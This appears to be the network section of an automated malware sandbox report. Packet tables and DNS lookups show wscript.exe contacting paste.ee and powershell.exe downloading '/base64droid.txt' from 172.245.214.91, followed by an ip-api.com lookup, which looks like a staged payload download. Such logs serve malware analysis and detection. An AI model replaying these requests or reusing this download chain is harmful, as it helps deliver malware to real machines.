Feb 15, 2024 19:42:31.603149891 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603162050 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603167057 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603183031 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603199959 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603204966 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603215933 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603231907 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603247881 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603250980 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603266001 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603274107 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603288889 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603311062 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603375912 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603390932 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603406906 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603423119 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603426933 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603446007 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603454113 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603480101 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603493929 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603527069 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603573084 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603631020 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603714943 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603735924 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603754997 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603756905 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603785992 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603810072 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603827953 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603871107 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.603892088 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603945017 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603964090 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.603987932 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604022026 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604067087 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604140997 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604190111 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604247093 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604248047 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604269028 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604293108 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604315996 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604389906 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604439020 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604451895 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604470968 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604510069 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604649067 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604688883 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604707003 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604749918 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604758024 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604794979 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604826927 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604846001 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604863882 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604882956 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604917049 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604944944 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.604957104 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.604989052 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605005980 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605029106 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605032921 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605077982 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605081081 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605099916 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605134964 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605144978 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605194092 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605212927 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605231047 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605238914 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605278969 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605304003 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605324030 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605344057 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605362892 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605459929 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605493069 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605504036 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605513096 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605549097 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605561972 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605581045 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605623007 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605637074 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605653048 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605669975 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605700970 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605715990 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605756998 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605757952 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605776072 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605824947 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605842113 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605880976 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.605932951 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.605966091 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606008053 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606051922 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.606053114 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606071949 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606112003 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.606116056 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606142998 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606173038 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606183052 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.606189013 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.606237888 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.706994057 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707024097 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707041025 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707057953 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707062960 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707075119 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707093000 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707102060 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707109928 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707127094 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707140923 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707144976 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707163095 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707168102 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707180023 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707196951 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707205057 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707246065 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707262039 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707310915 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707329035 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707345963 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707345963 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707376957 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707379103 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707504988 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707542896 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707578897 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707612991 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707647085 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707684040 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707731962 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707751036 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707772017 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707804918 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707839012 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707854986 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707873106 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707890034 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707911968 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707923889 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707963943 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.707973003 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.707993031 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708009958 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708024979 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708040953 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708056927 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708072901 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708074093 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708091021 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708106041 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708122969 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708138943 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708154917 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708185911 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708201885 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708225965 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708259106 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708276033 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708292007 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708327055 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708359957 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708364010 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708380938 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708411932 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708445072 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708462000 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708492994 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708493948 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708558083 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708590031 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708623886 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708708048 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708728075 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708743095 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708744049 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708774090 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708775043 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708806992 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708827972 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708852053 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708884001 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708900928 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708918095 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708918095 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708935976 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708951950 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.708952904 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708982944 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.708997965 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709014893 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709045887 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709065914 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709083080 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709115028 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709132910 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709208012 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709227085 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709247112 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709258080 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709290981 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709323883 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709341049 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709357023 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709372997 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709372997 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709403038 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709424019 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709445000 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709460974 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709482908 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709491014 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709506989 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709520102 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709605932 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709624052 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709639072 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709692955 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709724903 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709791899 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709880114 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709906101 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709914923 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709925890 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709942102 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709959030 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709969997 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.709974051 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.709997892 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710017920 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710052967 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710095882 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710163116 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710201025 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710206032 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710223913 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710241079 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710257053 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710264921 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710299969 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710319996 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710338116 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710369110 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710376978 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710385084 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710402012 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710424900 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710459948 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710478067 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710493088 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710500956 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710510015 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710527897 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.710582972 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710599899 CET	80	49723	172.245.214.91	192.168.2.6
Feb 15, 2024 19:42:31.710617065 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:31.753499031 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:32.053651094 CET	49723	80	192.168.2.6	172.245.214.91
Feb 15, 2024 19:42:33.421005011 CET	49724	80	192.168.2.6	208.95.112.1
Feb 15, 2024 19:42:33.514955997 CET	80	49724	208.95.112.1	192.168.2.6
Feb 15, 2024 19:42:33.515054941 CET	49724	80	192.168.2.6	208.95.112.1
Feb 15, 2024 19:42:33.515954018 CET	49724	80	192.168.2.6	208.95.112.1
Feb 15, 2024 19:42:33.611718893 CET	80	49724	208.95.112.1	192.168.2.6
Feb 15, 2024 19:42:33.659755945 CET	49724	80	192.168.2.6	208.95.112.1
Feb 15, 2024 19:43:30.842360973 CET	80	49724	208.95.112.1	192.168.2.6
Feb 15, 2024 19:43:30.842556953 CET	49724	80	192.168.2.6	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 15, 2024 19:42:00.500890017 CET	55303	53	192.168.2.6	1.1.1.1
Feb 15, 2024 19:42:00.600338936 CET	53	55303	1.1.1.1	192.168.2.6
Feb 15, 2024 19:42:25.292644024 CET	61397	53	192.168.2.6	1.1.1.1
Feb 15, 2024 19:42:25.540388107 CET	53	61397	1.1.1.1	192.168.2.6
Feb 15, 2024 19:42:33.323679924 CET	49451	53	192.168.2.6	1.1.1.1
Feb 15, 2024 19:42:33.412019014 CET	53	49451	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 15, 2024 19:42:00.500890017 CET	192.168.2.6	1.1.1.1	0x9811	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Feb 15, 2024 19:42:25.292644024 CET	192.168.2.6	1.1.1.1	0x884a	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Feb 15, 2024 19:42:33.323679924 CET	192.168.2.6	1.1.1.1	0xa573	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 15, 2024 19:42:00.600338936 CET	1.1.1.1	192.168.2.6	0x9811	No error (0)	paste.ee	104.21.84.67	A (IP address)	IN (0x0001)	false
Feb 15, 2024 19:42:00.600338936 CET	1.1.1.1	192.168.2.6	0x9811	No error (0)	paste.ee	172.67.187.200	A (IP address)	IN (0x0001)	false
Feb 15, 2024 19:42:25.540388107 CET	1.1.1.1	192.168.2.6	0x884a	No error (0)	uploaddeimagens.com.br	172.67.215.45	A (IP address)	IN (0x0001)	false
Feb 15, 2024 19:42:25.540388107 CET	1.1.1.1	192.168.2.6	0x884a	No error (0)	uploaddeimagens.com.br	104.21.45.138	A (IP address)	IN (0x0001)	false
Feb 15, 2024 19:42:33.412019014 CET	1.1.1.1	192.168.2.6	0xa573	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

172.245.214.91

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	104.21.84.67	80	2620	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Feb 15, 2024 19:42:00.710088015 CET	149	OUT	GET /d/SDfNF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: paste.ee
Feb 15, 2024 19:42:00.890531063 CET	788	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 15 Feb 2024 18:42:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://paste.ee/d/SDfNF CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1l%2BmG1MaLCjGODunyxNYDJ7yk5U2BbsE%2FaC5klk2knoDsyyx5L7K2Xk6US7pGbeOeVHcUr9VD%2Ful2V9WuYkcMJkbMMj%2Bhh9zuX8OTK3j6l8meLKr74RPMf5DIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 855fb032bc190f3d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Feb 15, 2024 19:42:00.890558004 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49723	172.245.214.91	80	2992	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Feb 15, 2024 19:42:31.182292938 CET	79	OUT	GET /base64droid.txt HTTP/1.1 Host: 172.245.214.91 Connection: Keep-Alive
